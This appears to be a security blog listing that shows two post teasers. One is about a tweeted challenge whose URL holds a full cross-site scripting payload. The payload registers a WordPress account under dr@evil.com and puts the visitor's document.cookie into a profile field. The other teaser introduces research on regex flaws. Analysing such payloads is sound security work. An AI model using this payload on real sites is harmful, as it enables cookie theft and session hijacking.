hiburn8 📈🔥🎱

A long time ago now, I tweeted a challenge to see of anyone knew what the following URL would attempt to do: http://www.insta-mapper.com/google_map.php?device_id=1234′;$.ajax({url:’/wp-login.php?action=register’,type:’POST’,data:”user_login=’dr’&user_email=’dr@evil.com’&gclient_id=&gredirect_uri=http://www.insta-mapper.com/&state_uri=http://www.insta-mapper.com&client_id=721352147882378&redirect_uri=http://www.insta-mapper.com&ws_plugin__s2member_registration=e4e7762e6a&ws_plugin__s2member_custom_reg_field_user_pass1=’123456’&ws_plugin__s2member_custom_reg_field_user_pass2=’123456’&ws_plugin__s2member_custom_reg_field_first_name=’d’&ws_plugin__s2member_custom_reg_field_last_name=’r’&ws_plugin__s2member_custom_reg_field_address_1=’1’&ws_plugin__s2member_custom_reg_field_address_2=&ws_plugin__s2member_custom_reg_field_city=s&ws_plugin__s2member_custom_reg_field_country=u&ws_plugin__s2member_custom_reg_field_mobile_devices='” encodeURI(document.cookie) “‘&ws_plugin__s2member_custom_reg_field_mobile_devices2=Apple&redirect_to=&wp-submit=Register”});var lol=’a Don’t worry, I don’t expect you to stare at that monstrosity. Instead I’ll just tell you; So a friend of mine was competing in WhiteHatRally last year, which is a sort…

In this post i’ll look at how a simple regex flaw I found on a web application, lead me down a pretty big exploratory hole of trying to search for regex vulnerabilities in applications… using regex; the results of which have since been useful on many of my engagements.